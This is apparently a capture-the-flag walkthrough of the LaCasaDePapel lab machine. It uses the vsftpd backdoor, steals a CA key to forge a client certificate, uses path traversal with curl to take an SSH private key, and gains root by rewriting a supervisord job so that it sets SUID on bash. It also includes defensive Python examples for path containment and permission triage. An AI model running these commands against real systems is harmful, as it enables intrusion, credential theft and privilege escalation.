LaCasaDePapel
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.131 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scanning the entire port range, from 1 to 65535.
-T5
insane mode, it is the fastest mode of the nmap time template.
-Pn
assume the host is online.
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
nmap -sC -sV -p21,22,80,443 10.10.10.131 -oN targeted
-sC
performs the scan using the default set of scripts.
-sV
enables version detection.
-oN
save the scan result into file, in this case the targeted file.
Port 21 is running vsftpd 2.3.4, which has a remote backdoor command execution vulnerability.
searchsploit vsftpd 2.3.4
If we inspect the code, we'll see that all it does is log in with a username containing the :) characters and an arbitrary password. That username triggers the backdoor, which opens a shell on port 6200 of the victim machine.
searchsploit -x unix/remote/49757.py
Let's try it. Log in to the FTP service as the user alfa8sa:) with the password alfa8sa.
ftp 10.10.10.131
The login itself fails, but the backdoor has now opened a shell on port 6200.
rlwrap nc 10.10.10.131 6200
As you can see, we don't get a bash shell; instead it is a Psy Shell, an interactive PHP shell. We could try to run system commands with functions such as system(), shell_exec() or exec(), but all of them are disabled, as phpinfo() shows.
phpinfo()
But we can still list directories and read files. There are home directories for the following users, which might be useful later.
scandir("/home/")
If we type ls, we'll see there is a variable called tokyo.
ls
This variable contains the absolute path of a private key.
show $tokyo
Let's obtain the key, and copy it to our local machine.
echo file_get_contents('/home/nairobi/ca.key')
As we saw earlier, port 443 is open, but the server returns an error because it requires a client certificate.
We can check whether the private key we just obtained is the one behind the CA certificate the HTTPS server presents. First, export the CA certificate from the browser as ca.crt.
Then extract the public key from each and compare the hashes. Both are the same, which means the CA certificate was created with the ca.key private key (MD5 is used here only as a quick equality check, not for anything security-relevant).
openssl x509 -in ca.crt -pubkey -noout | md5sum; openssl pkey -in ca.key -pubout | md5sum
Now we can create our own client certificate that the server will trust. Generate a key, create a certificate signing request, sign it with the CA key, and convert the result to PKCS#12 so it can be imported into the browser. Note that the -extensions client option only takes effect when -extfile points at a config file containing a client section; without one, OpenSSL ignores it, which does not matter here because the server only needs a certificate signed by its CA.
openssl genrsa -out client.key 4096
openssl req -new -key client.key -out client.csr
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Now, by inspecting the client.p12 file, we should see lacasadepapel.htb as the issuer.
openssl pkcs12 -info -in client.p12
Import the certificate in the browser under Your certificates.
Now, when accessing the HTTPS server, we'll be asked to select the certificate we just imported.
Then we'll be able to see the PRIVATE AREA.
Each season has several videos we can download, but the file link is composed of the /file/ directory followed by a base64-encoded string, and the encoded string is just the relative path of the file on the server.
echo U0VBU09OLTEvMTMuYXZp | base64 -d
Since the decoded path is used as-is, we can use ../ to leave the video directory. Let's try to retrieve the private SSH key of the user running the web server, then give the key the right permissions.
curl -s -k "https://10.10.10.131/file/$(echo -n '../.ssh/id_rsa' | base64)" > id_rsa; chmod 600 id_rsa
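To make the bug concrete, here is an added example (not code from the box or from this writeup) of the /file/ handler's decode-and-join logic next to a hardened version that confines the decoded path to the document root. The document root /var/www/private is an assumed, hypothetical name; the base64 tokens are the ones used above.

```python
import base64
import posixpath

# Assumed document root for the /file/ handler (hypothetical; the real path on the box is not known here)
DOCROOT = "/var/www/private"


def encode_file_param(rel_path: str) -> str:
    """Build the token that goes after /file/ (what the site does for its own links)."""
    return base64.b64encode(rel_path.encode()).decode()


def decode_file_param(token: str) -> str:
    """Reverse of encode_file_param: base64 token -> relative path."""
    return base64.b64decode(token).decode()


def resolve_vulnerable(token: str) -> str:
    """Decode and join with no containment check: '..' segments walk out of DOCROOT.
    This models the behaviour observed on the box."""
    return posixpath.normpath(posixpath.join(DOCROOT, decode_file_param(token)))


def resolve_hardened(token: str):
    """Decode strictly, reject absolute paths and NUL bytes, normalise, and require that the
    result stays inside DOCROOT. Returns None when the request is rejected.
    On a real filesystem also canonicalise with os.path.realpath so symlinks
    cannot be used to escape."""
    try:
        rel = base64.b64decode(token, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    if rel.startswith("/") or "\x00" in rel:
        return None
    full = posixpath.normpath(posixpath.join(DOCROOT, rel))
    if full != DOCROOT and not full.startswith(DOCROOT + "/"):
        return None
    return full


if __name__ == "__main__":
    print(resolve_vulnerable(encode_file_param("../.ssh/id_rsa")))   # /var/www/.ssh/id_rsa
    print(resolve_hardened(encode_file_param("../.ssh/id_rsa")))     # None
    print(resolve_hardened("U0VBU09OLTEvMTMuYXZp"))                  # /var/www/private/SEASON-1/13.avi
```

The containment test is done on the normalised path, not on the raw string: checking for ".." in the token would miss encodings and mixed forms, while normalising first and then requiring a DOCROOT prefix (with the trailing slash, so /var/www/private2 does not pass) rejects every traversal regardless of how it was spelled.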
I tried to use the private SSH key with every user found earlier, and it was valid for the professor user.
ssh -i id_rsa professor@10.10.10.131
In the professor home directory there is a file called memcached.ini.
ls -la
It contains a supervisord program definition whose command starts a node server.
cat memcached.ini
This job is probably executed by root. In fact, root is running the supervisord daemon, which is what manages jobs of this kind.
ps aux | grep supervisor
The idea is to change the command that gets executed. We can't edit the file, because its permissions only allow root to modify it. But deleting a file and creating a new one with the same name are governed by the permissions of the directory, not of the file, and memcached.ini lives in the professor home directory, which professor owns. So we can remove it and create a new one.
ls -ld .
rm memcached.ini
Now create the file again, this time with a command that sets the SUID bit on the bash binary when the job is executed.
echo -e "[program:memcached]\ncommand = chmod +s /bin/bash" > memcached.ini
Once the bash binary has the SUID bit set, run bash with -p so it keeps the effective uid of root, and all that's left is to reap the harvest and grab the user and root flags.
ls -l /bin/bash; bash -p
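The escalation above hinges on a Unix permission detail worth checking programmatically when you land on a box: whether you can unlink and recreate a file depends on the parent directory (write and search permission, plus the sticky-bit ownership rule), not on the file's own mode bits. The following is an added example, not code from the box or this writeup, that implements that check and exercises it on a constructed scenario: a read-only memcached.ini inside a directory the current user owns. The file contents are a placeholder, not the real job definition.

```python
import os
import shutil
import stat
import tempfile


def can_replace(path: str) -> bool:
    """True if the current user could rm PATH and create a new file of the same name.
    Unlink and create are permission checks on the parent directory: it must grant
    write and search (x). If the directory has the sticky bit (like /tmp), the caller
    must additionally own the file or the directory. Root bypasses all of this."""
    parent = os.path.dirname(os.path.abspath(path)) or "/"
    if os.geteuid() == 0:
        return os.path.isdir(parent)
    if not os.access(parent, os.W_OK | os.X_OK):
        return False
    pst = os.stat(parent)
    if pst.st_mode & stat.S_ISVTX:
        try:
            file_uid = os.stat(path).st_uid
        except FileNotFoundError:
            file_uid = None
        if os.geteuid() not in (file_uid, pst.st_uid):
            return False
    return True


def replaceable_but_not_writable(paths):
    """Filter candidate config files (e.g. everything a supervisord include glob picks up)
    down to those we cannot edit in place but can delete and recreate."""
    return [p for p in paths
            if os.path.exists(p) and not os.access(p, os.W_OK) and can_replace(p)]


def demo() -> dict:
    """Constructed scenario (not the real box): a 0444 memcached.ini in a directory we own.
    Returns the answer of each check so it can be inspected or asserted on."""
    d = tempfile.mkdtemp()          # mode 0700, owned by us, no sticky bit
    ini = os.path.join(d, "memcached.ini")
    with open(ini, "w") as fh:
        fh.write("[program:memcached]\ncommand = node app.js  ; constructed placeholder\n")
    os.chmod(ini, 0o444)            # file itself is read-only for everyone
    out = {
        "root": os.geteuid() == 0,
        "file_writable": os.access(ini, os.W_OK),
        "replaceable": can_replace(ini),
        "candidates": replaceable_but_not_writable([ini]),
    }
    os.chmod(d, 0o555)              # remove write on the directory: now we are stuck
    out["replaceable_after_dir_locked"] = can_replace(ini)
    os.chmod(d, 0o700)
    shutil.rmtree(d)
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Running it as an unprivileged user reports file_writable False but replaceable True, which is exactly the situation with memcached.ini in the professor home directory; locking the directory flips replaceable to False. The same function, pointed at every file a root-run service reads from a user-owned directory, is a quick triage for this class of privilege escalation.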